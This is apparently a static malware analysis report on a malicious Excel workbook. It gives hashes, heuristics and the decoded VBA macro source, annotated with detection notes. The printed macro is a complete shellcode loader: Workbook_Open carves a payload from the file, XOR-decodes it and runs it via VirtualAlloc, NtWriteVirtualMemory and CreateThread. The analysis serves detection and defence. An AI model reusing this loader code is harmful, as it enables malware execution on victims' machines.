Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dfd2f7f87b6c8156…

MALICIOUS

Office (OLE)

38.7 KB Created: 2017-08-03 08:16:44 Authoring application: Microsoft Excel First seen: 2017-08-08
MD5: 557610366b150bece02544339c0ed96f SHA-1: 3677911ef890b63f8c7090b61ac5421187d52d8a SHA-256: dfd2f7f87b6c8156492818336f70e8917853ee2db10d29d980d8252690344a6e
138 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains both Excel 4.0 (XLM) macros and VBA macros; the VBA macros reference Windows API functions such as VirtualAlloc and CreateThread, which suggests the sample allocates memory and executes code — likely a second-stage payload. The ClamAV detection 'Xls.Dropper.Agent-6335064-0' further supports its role as a dropper.

Heuristics 7

  • ClamAV: Xls.Dropper.Agent-6335064-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-6335064-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        IqQsCEAqnVJvCzh
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4736 bytes
SHA-256: 332c7c5f127fe66c698aaca2ebf7970e4db8479c9065d639909eb60860dfefba
Detection
ClamAV: No threats found
Obfuscation or payload: likely
37 of 71 identifiers look randomly generated (e.g. 'hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlno') — consistent with name-mangling obfuscation. The carved artifact contains 1 long base64-like blob.
Preview script
First 1,000 lines of the extracted script
' Module header as recovered by olevba. VB_Name "BuÇalışmaKitabı" is Turkish for
' "ThisWorkbook", and VB_PredeclaredId = True with the 00020819-... base GUID
' matches a workbook document module — so the Workbook_Open handler further down
' is an auto-execute entry point once macros are enabled (confirm against the
' OLE stream names if exact module identity matters for the report).
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

' Win32 imports behind randomised procedure names. The VBA7 branch uses PtrSafe /
' LongPtr so the loader also works in 64-bit Office; the #Else branch is the
' 32-bit fallback. Two of the three imports are hidden behind Alias strings
' ("CreateThread", "VirtualAlloc"); NtWriteVirtualMemory is declared under its
' real name from NTDLL. Detection note: the Alias literal and the Lib name must
' match the real export, so they survive the identifier mangling and are the
' stable strings to key YARA / olevba rules on (SC_STR_VIRTUALALLOC above fires
' on exactly this).
#If VBA7 Then
Private Declare PtrSafe Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As LongPtr, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As LongPtr
Private Declare PtrSafe Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As LongPtr, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As LongPtr, ByVal DUIVFNJyRUxiZCpoON As LongPtr, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As LongPtr, ByRef VOkqzIImxNVKafXh As LongPtr) As LongPtr
#Else
Private Declare Function KbwwMGLUx Lib "kernel32" Alias "CreateThread"  (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As Long, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As Long
Private Declare Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As Long, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As Long, ByVal DUIVFNJyRUxiZCpoON As Long, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As Long, ByRef VOkqzIImxNVKafXh As Long) As Long
#End If

' VirtualAlloc arguments used below: &H1000 is MEM_COMMIT, &H40 is
' PAGE_EXECUTE_READWRITE. An RWX commit requested from the Office process is the
' behavioural indicator to alert on (EDR memory-protection telemetry).
Const dLWCyrKSc = &H1000
Const HvZmRoFmIemsxuAH = &H40

' Main loader routine, reached via Workbook_Open -> Document_Open. Reproduced
' byte-for-byte for analysis. Three stages are visible: (1) carve an embedded
' blob out of the workbook's own file on disk, (2) XOR-decode it with a
' hard-coded key, (3) run it as shellcode in the Excel process. No return value
' is ever checked, so any failure is silent.
Public Sub IqQsCEAqnVJvCzh()
    Dim VHDDGQOIvEcHoVWuIzFyrUkgHrPU() As Byte

    ' Stage 1: the payload travels inside this same .xls — the macro reads the
    ' currently open workbook file back from disk (ActiveWorkbook.FullName).
    VHDDGQOIvEcHoVWuIzFyrUkgHrPU = vDRyoSBQHkkAjoWoXGTsfLvd(ActiveWorkbook.FullName)
    Dim JgJdiSVLOQRBiXYCScsYpN As String
    ' StrConv(..., 64) is vbUnicode: widens each file byte into one character.
    JgJdiSVLOQRBiXYCScsYpN = StrConv(VHDDGQOIvEcHoVWuIzFyrUkgHrPU, 64)
    
    Dim TIEawx
    ' The long random-looking literal is a delimiter: the file is split on it and
    ' only the text after its last occurrence is kept. It is a strong static
    ' signature for this builder (its prefix is the identifier quoted in the
    ' obfuscation finding above).
    TIEawx = Split(JgJdiSVLOQRBiXYCScsYpN, "hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlnovWpmVQWRNctXsXybhDUDajLUqLRpmWiCFIDAQJTTQCmhslqSdNgRqKolkvWkZHFQUQsJuXkyKbMxXEBeuYmyPrlVurqvNIUjWvmBSHyfCHgpXQoFTRPaugbDFxocHPLbgCBCrZmNAhVhkWXEdKBVT")

    Dim oaUYMytDfdbIUJOXjXmDOpxVvVd As String
    Dim BmDubhXpZ As String
    Dim MuzsiYOcKJKiNouLDnIHufF As String
    ' Last segment, then a vbUnicode (64) / vbFromUnicode (128) round-trip; the
    ' exact byte effect is code-page dependent — confirm in a sandbox before
    ' relying on it for payload extraction.
    BmDubhXpZ = StrConv(StrConv(TIEawx(UBound(TIEawx)), 64), 128)
    ' Drop the first two characters of the carved segment.
    MuzsiYOcKJKiNouLDnIHufF = Mid$(BmDubhXpZ, 3, Len(BmDubhXpZ))

    ' Stage 2: repeating-key XOR (see vculRliv) with the hard-coded key literal.
    oaUYMytDfdbIUJOXjXmDOpxVvVd = vculRliv("PPtJWvtvyNWfiupLoTFcAnlTtJz", MuzsiYOcKJKiNouLDnIHufF)
    
    #If VBA7 Then
        Dim pZIQFpHF As LongPtr
        Dim MLXTRqqLZIyRutlLQG As LongPtr
    #Else
        Dim pZIQFpHF As Long
        Dim MLXTRqqLZIyRutlLQG As Long
    #End If

    ' Stage 3: VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE) ->
    ' NtWriteVirtualMemory with handle -1 (the current-process pseudo-handle)
    ' copying the decoded string into the RWX buffer -> CreateThread starting at
    ' the buffer. This is the in-process shellcode pattern behind the
    ' T1059.005 / T1203 mapping; RWX allocation plus thread creation from
    ' EXCEL.EXE is the sequence to hunt for in endpoint telemetry.
    pZIQFpHF = PWUFrFPWzTDZatGuCMUnsLK(0, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), dLWCyrKSc, HvZmRoFmIemsxuAH)
    MLXTRqqLZIyRutlLQG = NtWriteVirtualMemory(-1, pZIQFpHF, oaUYMytDfdbIUJOXjXmDOpxVvVd, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), 0)
    MLXTRqqLZIyRutlLQG = KbwwMGLUx(0, 0, pZIQFpHF, 0, 0, 0)
End Sub

' Read an entire file into a Byte array. Used by the loader to re-read the
' workbook itself, so the payload never has to exist as a separate dropped
' file on disk. Raises VBA error 53 ("File not found") when Dir() returns an
' empty string for the path.
Public Function vDRyoSBQHkkAjoWoXGTsfLvd(ByVal TgYDYCQuD As String) As Byte()
    Dim BmDubhXpZ As Long
    Dim MuzsiYOcKJKiNouLDnIHufF() As Byte
    BmDubhXpZ = FreeFile
    If LenB(Dir(TgYDYCQuD)) Then
        Open TgYDYCQuD For Binary Access Read As BmDubhXpZ
        ' Buffer sized to the file length (LOF) with a 0-based upper bound.
        ReDim MuzsiYOcKJKiNouLDnIHufF(LOF(BmDubhXpZ) - 1&) As Byte
        Get BmDubhXpZ, , MuzsiYOcKJKiNouLDnIHufF
        Close BmDubhXpZ
    Else
        Err.Raise 53
    End If
    vDRyoSBQHkkAjoWoXGTsfLvd = MuzsiYOcKJKiNouLDnIHufF
    ' The return value already holds a copy; this only frees the local array.
    Erase MuzsiYOcKJKiNouLDnIHufF
End Function

' Document_Open is the Word auto-execute event name; in an Excel workbook
' module it does not fire by itself and is only reached from Workbook_Open
' below. Its presence alongside Workbook_Open suggests a builder template
' shared between Word and Excel lures (inference from the names, not proven
' here).
Public Sub Document_Open()
    IqQsCEAqnVJvCzh
End Sub

' Auto-execute entry point for Excel: runs when the workbook opens with macros
' enabled, and chains into the loader via Document_Open.
Sub Workbook_Open()
    Document_Open
End Sub

' Repeating-key XOR: each character of qEJGr (data) is XORed with the character
' of rxyGGuaONJUytyo (key) at the same 1-based position modulo the key length.
' The key is wrapped manually because Mod yields 0 where a 1-based index needs
' Len(key). String concatenation in a loop is O(n^2) but irrelevant for the
' payload sizes involved; the scheme itself is trivially reversible once the
' key literal from the caller is known.
Public Function vculRliv(rxyGGuaONJUytyo As String, qEJGr As String) As String
    Dim GPtXgEDlzBoMv As Long
    Dim VeWTITGwLHbDflAGyPeaRJnIo As String
    Dim lCjskHdyelHQYyL As Integer, wIkxhYSyhCu As Integer, a As Long

    For GPtXgEDlzBoMv = 1 To Len(qEJGr)
        ' 1-based key index; a Mod result of 0 means "last key character".
        a = GPtXgEDlzBoMv Mod Len(rxyGGuaONJUytyo)
        If a = 0 Then a = Len(rxyGGuaONJUytyo)
        
        lCjskHdyelHQYyL = Asc(Mid$(qEJGr, GPtXgEDlzBoMv, 1))
        wIkxhYSyhCu = Asc(Mid$(rxyGGuaONJUytyo, a, 1))
        VeWTITGwLHbDflAGyPeaRJnIo = VeWTITGwLHbDflAGyPeaRJnIo + Chr(lCjskHdyelHQYyL Xor wIkxhYSyhCu)
    Next GPtXgEDlzBoMv
    
   vculRliv = VeWTITGwLHbDflAGyPeaRJnIo
End Function